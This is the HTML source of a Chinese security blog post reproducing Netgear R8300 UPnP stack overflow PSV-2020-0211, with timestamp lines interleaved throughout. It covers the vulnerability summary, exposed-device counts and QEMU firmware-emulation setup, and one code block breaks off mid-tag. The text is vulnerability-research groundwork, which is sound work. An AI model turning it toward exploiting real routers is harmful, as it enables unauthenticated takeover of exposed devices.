2021-01-08 05:39:16 +00:00
<!DOCTYPE html>
2021-04-10 12:03:10 +00:00
< html class = "theme-next muse use-motion" lang = "zh-Hans" >
2021-01-08 05:39:16 +00:00
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
2021-04-10 19:19:48 +00:00
< script src = "/lib/pace/pace.min.js?v=1.0.2" > < / script >
< link href = "/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel = "stylesheet" >
2021-01-08 05:39:16 +00:00
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
2021-03-02 06:31:33 +00:00
< meta name = "keywords" content = "UPnP,固件模拟,Netgear," >
2021-01-08 05:39:16 +00:00
2021-04-11 06:53:08 +00:00
< link rel = "alternate" href = "/atom.xml" title = "混元霹雳手" type = "application/atom+xml" >
2021-01-08 05:39:16 +00:00
2021-04-10 13:53:56 +00:00
< meta name = "description" content = "复现一个漏洞" >
2021-03-02 06:31:33 +00:00
< meta name = "keywords" content = "UPnP,固件模拟,Netgear" >
2021-01-08 05:39:16 +00:00
< meta property = "og:type" content = "article" >
2021-01-08 05:55:39 +00:00
< meta property = "og:title" content = "Netgear_栈溢出漏洞_PSV-2020-0211" >
2021-01-08 05:39:16 +00:00
< meta property = "og:url" content = "https://cool-y.github.io/2021/01/08/Netgear-psv-2020-0211/index.html" >
< meta property = "og:site_name" content = "混元霹雳手" >
2021-04-10 13:53:56 +00:00
< meta property = "og:description" content = "复现一个漏洞" >
2021-01-08 05:39:16 +00:00
< meta property = "og:locale" content = "zh-Hans" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083781/netgear/1_3.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083836/netgear/image_28.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083882/netgear/image_29.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083972/netgear/image_30.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083781/netgear/image_23.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083780/netgear/image_24.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083780/netgear/image_25.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083780/netgear/image_26.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083779/netgear/image_27.png" >
2021-04-11 06:53:08 +00:00
< meta property = "og:updated_time" content = "2021-04-11T06:19:14.576Z" >
2021-01-08 05:39:16 +00:00
< meta name = "twitter:card" content = "summary" >
2021-01-08 05:55:39 +00:00
< meta name = "twitter:title" content = "Netgear_栈溢出漏洞_PSV-2020-0211" >
2021-04-10 13:53:56 +00:00
< meta name = "twitter:description" content = "复现一个漏洞" >
2021-01-08 05:39:16 +00:00
< meta name = "twitter:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083781/netgear/1_3.png" >
< script type = "text/javascript" id = "hexo.configurations" >
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
2021-04-10 12:03:10 +00:00
scheme: 'Muse',
2021-01-08 05:39:16 +00:00
version: '5.1.4',
2021-04-10 20:13:11 +00:00
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
2021-01-08 05:39:16 +00:00
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
< / script >
< link rel = "canonical" href = "https://cool-y.github.io/2021/01/08/Netgear-psv-2020-0211/" >
2021-01-08 05:55:39 +00:00
< title > Netgear_栈溢出漏洞_PSV-2020-0211 | 混元霹雳手< / title >
2021-01-08 05:39:16 +00:00
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
2021-04-10 20:10:04 +00:00
< p class = "site-subtitle" > Battle⚔️ 2 the world🌎< / p >
2021-01-08 05:39:16 +00:00
< / div >
< div class = "site-nav-toggle" >
< button >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< / button >
< / div >
< / div >
< nav class = "site-nav" >
< ul id = "menu" class = "menu" >
< li class = "menu-item menu-item-home" >
< a href = "/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-home" > < / i > < br >
首页
< / a >
< / li >
< li class = "menu-item menu-item-about" >
< a href = "/about/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-user" > < / i > < br >
关于
< / a >
< / li >
< li class = "menu-item menu-item-tags" >
< a href = "/tags/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-tags" > < / i > < br >
标签
< / a >
< / li >
< li class = "menu-item menu-item-categories" >
< a href = "/categories/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-th" > < / i > < br >
分类
< / a >
< / li >
< li class = "menu-item menu-item-archives" >
< a href = "/archives/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-archive" > < / i > < br >
归档
< / a >
< / li >
< li class = "menu-item menu-item-bookmarks" >
< a href = "/bookmarks/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-map" > < / i > < br >
书签
< / a >
< / li >
2021-04-11 06:53:08 +00:00
< li class = "menu-item menu-item-album" >
< a href = "/album/" rel = "section" >
2021-01-08 05:39:16 +00:00
< i class = "menu-item-icon fa fa-fw fa-heartbeat" > < / i > < br >
2021-04-11 06:53:08 +00:00
相簿
2021-01-08 05:39:16 +00:00
< / a >
< / li >
< / ul >
< / nav >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2021/01/08/Netgear-psv-2020-0211/" >
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
2021-01-08 05:55:39 +00:00
< h1 class = "post-title" itemprop = "name headline" > Netgear_栈溢出漏洞_PSV-2020-0211< / h1 >
2021-01-08 05:39:16 +00:00
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2021-01-08T13:26:26+08:00" >
2021-01-08
< / time >
< / span >
2021-01-08 05:55:39 +00:00
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
< a href = "/categories/IOT/" itemprop = "url" rel = "index" >
< span itemprop = "name" > IOT< / span >
< / a >
< / span >
< / span >
2021-01-08 05:39:16 +00:00
2021-01-08 05:55:39 +00:00
< span id = "/2021/01/08/Netgear-psv-2020-0211/" class = "leancloud_visitors" data-flag-title = "Netgear_栈溢出漏洞_PSV-2020-0211" >
2021-01-08 05:39:16 +00:00
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-eye" > < / i >
< / span >
< span class = "post-meta-item-text" > 阅读次数: < / span >
< span class = "leancloud-visitors-count" > < / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
2021-04-11 06:53:08 +00:00
7k 字
2021-01-08 05:39:16 +00:00
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
2021-04-11 06:53:08 +00:00
38 分钟
2021-01-08 05:39:16 +00:00
< / span >
< / div >
2021-04-10 13:53:56 +00:00
< div class = "post-description" >
复现一个漏洞
< / div >
2021-01-08 05:39:16 +00:00
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
2021-01-08 05:55:39 +00:00
< p > < strong > 固件模拟与UPnP栈溢出利用< / strong > < br > < a href = "https://kb.netgear.com/000062158/Security-Advisory-for-Pre-Authentication-Command-Injection-on-R8300-PSV-2020-0211" target = "_blank" rel = "noopener" > https://kb.netgear.com/000062158/Security-Advisory-for-Pre-Authentication-Command-Injection-on-R8300-PSV-2020-0211< / a > < br > < a href = "https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r8300-upnpd-preauth-rce/" target = "_blank" rel = "noopener" > https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r8300-upnpd-preauth-rce/< / a > < br > < a href = "https://paper.seebug.org/1311/#1" target = "_blank" rel = "noopener" > https://paper.seebug.org/1311/#1< / a > < br > < a href = "https://www.anquanke.com/post/id/217606" target = "_blank" rel = "noopener" > https://www.anquanke.com/post/id/217606< / a > < / p >
2021-01-08 05:39:16 +00:00
< h2 id = "0x00-漏洞概要" > < a href = "#0x00-漏洞概要" class = "headerlink" title = "0x00 漏洞概要" > < / a > < strong > 0x00 漏洞概要< / strong > < / h2 > < table >
< thead >
< tr >
< th > 漏洞编号:< / th >
< th > PSV-2020-0211< / th >
< / tr >
< / thead >
< tbody >
< tr >
< td > 披露时间:< / td >
< td > < em > 2020 -07-31 — < a href = "https://kb.netgear.com/000062158/Security-Advisory-for-Pre-Authentication-Command-Injection-on-R8300-PSV-2020-0211" target = "_blank" rel = "noopener" > Netgear 官方发布安全公告< / a > < / em > 2020-08-18 – < a href = "https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r8300-upnpd-preauth-rce/" target = "_blank" rel = "noopener" > 漏洞公开披露< / a > < / td >
< / tr >
< tr >
< td > 影响厂商:< / td >
< td > Netgear< / td >
< / tr >
< tr >
< td > 漏洞类型:< / td >
< td > 栈溢出漏洞< / td >
< / tr >
< tr >
< td > 漏洞评分( CVSS) : < / td >
< td > 9.6, (AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)< / td >
< / tr >
< tr >
< td > 利用条件:< / td >
< td > 该漏洞只需攻击者能够通过网络访问被攻击路由器的UPnP服务, 无需身份验证。< / td >
< / tr >
< tr >
< td > 漏洞成因:< / td >
< td > 该漏洞位于路由器的 UPnP 服务中, 由于解析 SSDP 协议数据包的代码存在缺陷,导致未经授权的远程攻击者可以发送特制的数据包使得栈上的 buffer 溢出,进一步控制 PC 执行任意代码。< / td >
< / tr >
< / tbody >
< / table >
< h2 id = "0x01-威胁范围" > < a href = "#0x01-威胁范围" class = "headerlink" title = "0x01 威胁范围" > < / a > < strong > 0x01 威胁范围< / strong > < / h2 > < table >
< thead >
< tr >
< th > 影响范围:< / th >
< th > R8300 running firmware versions prior to 1.0.2.134< / th >
< / tr >
< / thead >
< tbody >
< tr >
< td > ZoomEye查询结果: < / td >
< td > Netgear R8300共有579台设备暴露在互联网上, 绝大部分分布在美国, 少量设备出现在欧洲< / td >
< / tr >
< tr >
< td > —< / td >
< td > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083781/netgear/1_3.png" alt > < / td >
< / tr >
< tr >
< td > < / td >
< / tr >
< / tbody >
< / table >
< h2 id = "0x02-Qemu模拟" > < a href = "#0x02-Qemu模拟" class = "headerlink" title = "0x02 Qemu模拟" > < / a > 0x02 Qemu模拟< / h2 > < table >
< thead >
< tr >
< th > 真机调试< / th >
< th > 硬件调试接口< / th >
< th > uart< / th >
< / tr >
< / thead >
< tbody >
< tr >
< td > 历史RCE< / td >
< td > NETGEAR 多款设备基于堆栈的缓冲区溢出远程执行代码漏洞< / td >
< / tr >
< tr >
< td > 设备后门开启telnet< / td >
< td > < a href = "https://openwrt.org/toh/netgear/telnet.console#for_newer_netgear_routers_that_accept_probe_packet_over_udp_ex2700_r6700_r7000_and_r7500" target = "_blank" rel = "noopener" > Unlocking the Netgear Telnet Console< / a > < / td >
< / tr >
< tr >
< td > 固件篡改植入telnet< / td >
< td > < / td >
< / tr >
< tr >
< td > 固件模拟< / td >
< td > QEMU< / td >
< td > 现有平台上模拟 ARM、MIPS、X86、PowerPC、SPARK 等多种架构。< / td >
< / tr >
< tr >
< td > 树莓派、开发板< / td >
< td > 只要 CPU 指令集对的上,就可以跑起来< / td >
< / tr >
< tr >
< td > firmadyne< / td >
< td > 基于qemu定制< / td >
< / tr >
< tr >
< td > Qemu STM32< / td >
< td > < / td >
< / tr >
< tr >
< td > Avatar< / td >
< td > 混合式仿真< / td >
< / tr >
< / tbody >
< / table >
< p > < a href = "http://cjc.ict.ac.cn/online/bfpub/yyc-2020818141436.pdf" target = "_blank" rel = "noopener" > 嵌入式设备固件安全分析技术研究综述 http://cjc.ict.ac.cn/online/bfpub/yyc-2020818141436.pdf< / a > < / p >
< p > 由于没有真机,我们采用了固件模拟的方式来搭建分析环境。< br > 首先下载有问题的固件 R8300 Firmware Version 1.0.2.130 < a href = "http://www.downloads.netgear.com/files/GDC/R8300/R8300-V1.0.2.130_1.0.99.zip" target = "_blank" rel = "noopener" > http://www.downloads.netgear.com/files/GDC/R8300/R8300-V1.0.2.130_1.0.99.zip< / a > < br > 使用binwalk对固件中的特征字符串进行识别, 可以看到R8300采用了squashfs文件系统格式< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > $< / span > binwalk R8300-V1.0.2.130_1.0.99.chk< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > DECIMAL HEXADECIMAL DESCRIPTION< / span > < br > < span class = "line" > --------------------------------------------------------------------------------< / span > < br > < span class = "line" > 58 0x3A TRX firmware header, little endian, image size: 32653312 bytes, CRC32: 0x5CEAB739, flags: 0x0, version: 1, header size: 28 bytes, loader offset: 0x1C, linux kernel offset: 0x21AB50, rootfs offset: 0x0< / span > < br > < span class = "line" > 86 0x56 LZMA compressed data, properties: 0x5D, dictionary size: 65536 bytes, uncompressed size: 5470272 bytes< / span > < br > < span class = "line" > 2206602 0x21AB8A Squashfs filesystem, little endian, version 4.0, compression:xz, size: 30443160 bytes, 1650 inodes, blocksize: 131072 bytes, created: 2018-12-13 04:36:38< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 使用 < code > binwalk -Me< / code > 提取出 Squashfs 文件系统, 可以看到R8300为ARM v5架构.< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > $< / span > file usr/sbin/upnpd< / span > < br > < span class = "line" > usr/sbin/upnpd: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked (uses shared libs), stripped< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< h3 id = "firmadyne" > < a href = "#firmadyne" class = "headerlink" title = "firmadyne" > < / a > firmadyne< / h3 > < p > 直接使用firmadyne模拟R8300固件失败, 一是网络接口初始化失败, 二是NVRAM配置存在问题< br > 原因可能是:< / p >
< ul >
< li > firmadyne只支持armel、mipseb、 mipsel这三种系统内核, 相比我们熟悉的armel, armhf代表了另一种不兼容的二进制标准。< a href = "https://people.debian.org/~aurel32/qemu/armhf/" target = "_blank" rel = "noopener" > https://people.debian.org/~aurel32/qemu/armhf/< / a > < / li >
< li > < p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083836/netgear/image_28.png" alt > < / p >
< / li >
< li > < p > NVRAM库劫持失败, firmadyne实现了sem_get()、sem_lock()、sem_unlock()等函数< a href = "https://github.com/firmadyne/libnvram" target = "_blank" rel = "noopener" > https://github.com/firmadyne/libnvram< / a > < / p >
< / li >
< / ul >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < span class = "line" > 71< / span > < br > < span class = "line" > 72< / span > < br > < span class = "line" > 73< / span > < br > < span class = "line" > 74< / span > < br > < span class = "line" > 75< / span > < br > < span class = "line" > 76< / span > < br > < span class = "line" > 77< / span > < br > < span class = "line" > 78< / span > < br > < span class = "line" > 79< / span > < br > < span class = "line" > 80< / span > < br > < span class = "line" > 81< / span > < br > < span class = "line" > 82< / span > < br > < span class = "line" > 83< / span > < br > < span class = "line" > 84< / span > < br > < span class = "line" > 85< / span > < br > < span class = "line" > 86< / span > < br > < span class = "line" > 87< / span > < br > < span class = "line" > 88< / span > < br > < span class = "line" > 89< / span > < br > < span class = "line" > 90< / span > < br > < span class = "line" > 91< / span > < br > < span class = "line" > 92< / span > < br > < span class = "line" > 93< / span > < br > < span class = "line" > 94< / span > < br > < span class = "line" > 95< / span > < br > < span class = "line" > 96< / span > < br > < span class = "line" > 97< / span > < br > < span class = "line" > 98< / span > < br > < span class = "line" > 99< / span > < br > < span class = "line" > 100< / span > < br > < span class = "line" > 101< / span > < br > < span class = "line" > 102< / span > < br > < span class = "line" > 103< / span > < br > < span class = "line" > 104< / span > < br > < span class = "line" > 105< / span > < br > < span class = "line" > 106< / span > < br > < span class = "line" > 107< / span > < br > < span class = "line" > 108< / span > < br > < span class = "line" > 109< / span > < br > < span class = "line" > 110< / span > < br > < span class = "line" > 111< / span > < br > < span class = "line" > 112< / span > < br > < span class = "line" > 113< / span > < br > < span class = "line" > 114< / span > < br > < span class = "line" > 115< / span > < br > < span class = "line" > 116< / span > < br > < span class = "line" > 117< / span > < br > < span class = "line" > 118< / span > < br > < span class = "line" > 119< / span > < br > < span class = "line" > 120< / span > < br > < span class = "line" > 121< / span > < br > < span class = "line" > 122< / span > < br > < span class = "line" > 123< / span > < br > < span class = "line" > 124< / span > < br > < span class = "line" > 125< / span > < br > < span class
2021-01-08 05:39:16 +00:00
< h3 id = "Qemu自定义" > < a href = "#Qemu自定义" class = "headerlink" title = "Qemu自定义" > < / a > Qemu自定义< / h3 > < ol >
< li > < strong > 配置arm虚拟机< / strong > < / li >
< / ol >
< p > 使用Qemu模拟固件需要下载对应的arm虚拟机镜像, 内核和initrd。< br > < a href = "https://people.debian.org/~aurel32/qemu/armhf/" target = "_blank" rel = "noopener" > https://people.debian.org/~aurel32/qemu/armhf/< / a > < / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > [debian_wheezy_armhf_desktop.qcow2](https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_desktop.qcow2) 2013-12-17 02:43 1.7G [debian_wheezy_armhf_standard.qcow2](https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2) 2013-12-17 00:04 229M < / span > < br > < span class = "line" > [initrd.img-3.2.0-4-vexpress](https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress) 2013-12-17 01:57 2.2M < / span > < br > < span class = "line" > [vmlinuz-3.2.0-4-vexpress](https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress) 2013-09-20 18:33 1.9M< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 标准的虚拟机启动命令为< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > - qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append " root=/dev/mmcblk0p2" < / span > < br > < span class = "line" > - qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_desktop.qcow2 -append " root=/dev/mmcblk0p2" < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 对于R8300固件, 在 Host 机上创建一个 tap 接口并分配 IP, 启动虚拟机: < / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > sudo tunctl -t tap0 -u `whoami`< / span > < br > < span class = "line" > sudo ifconfig tap0 192.168.2.1/24< / span > < br > < span class = "line" > qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic`< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 与标准命令区别在于< code > -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic< / code > < br > 启动之后输入用户名和密码,都是 root, 为虚拟机分配 IP: < / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > root@debian-armhf:~# ifconfig eth0 192.168.2.2/24< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 这样 Host 和虚拟机就网络互通了,然后挂载 proc、dev, 最后 chroot 即可。< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > root@debian-armhf:~# mount -t proc /proc ./squashfs-root/proc< / span > < br > < span class = "line" > root@debian-armhf:~# mount -o bind /dev ./squashfs-root/dev< / span > < br > < span class = "line" > root@debian-armhf:~# chroot ./squashfs-root/ sh< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< ol >
< li > < strong > 修复依赖< / strong > < / li >
< / ol >
< p > NVRAM( 非易失性 RAM) 用于存储路由器的配置信息,而 upnpd 运行时需要用到其中部分配置信息。在没有硬件设备的情况下,我们可以使用 < code > LD_PRELOAD< / code > 劫持以下函数符号。手动创建 < code > /tmp/var/run< / code > 目录,再次运行提示缺少 < code > /dev/nvram< / code > 。< / p >
< ul >
< li > < p > 编译nvram.so< / p >
< p > < a href = "https://raw.githubusercontent.com/therealsaumil/custom_nvram/master/custom_nvram_r6250.c" target = "_blank" rel = "noopener" > https://raw.githubusercontent.com/therealsaumil/custom_nvram/master/custom_nvram_r6250.c< / a > < / p >
< / li >
< / ul >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > $ arm-linux-gcc -Wall -fPIC -shared nvram.c -o nvram.so< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< ul >
< li > 劫持< code > dlsym< / code > < / li >
< / ul >
< p > nvram库的实现者还同时 hook 了 < code > system< / code > 、< code > fopen< / code > 、< code > open< / code > 等函数,因此还会用到 < code > dlsym< / code > , < code > /lib/libdl.so.0< / code > 导出了该符号。< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > $ grep -r " dlsym" .< / span > < br > < span class = "line" > Binary file ./lib/libcrypto.so.1.0.0 matches< / span > < br > < span class = "line" > Binary file ./lib/libdl.so.0 matches< / span > < br > < span class = "line" > Binary file ./lib/libhcrypto-samba4.so.5 matches< / span > < br > < span class = "line" > Binary file ./lib/libkrb5-samba4.so.26 matches< / span > < br > < span class = "line" > Binary file ./lib/libldb.so.1 matches< / span > < br > < span class = "line" > Binary file ./lib/libsamba-modules-samba4.so matches< / span > < br > < span class = "line" > Binary file ./lib/libsqlite3.so.0 matches< / span > < br > < span class = "line" > grep: ./lib/modules/2.6.36.4brcmarm+: No such file or directory< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $ readelf -a *./lib/libdl.so.**0* | grep dlsym< / span > < br > < span class = "line" > 26: 000010f0 296 FUNC GLOBAL DEFAULT 7 dlsym< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
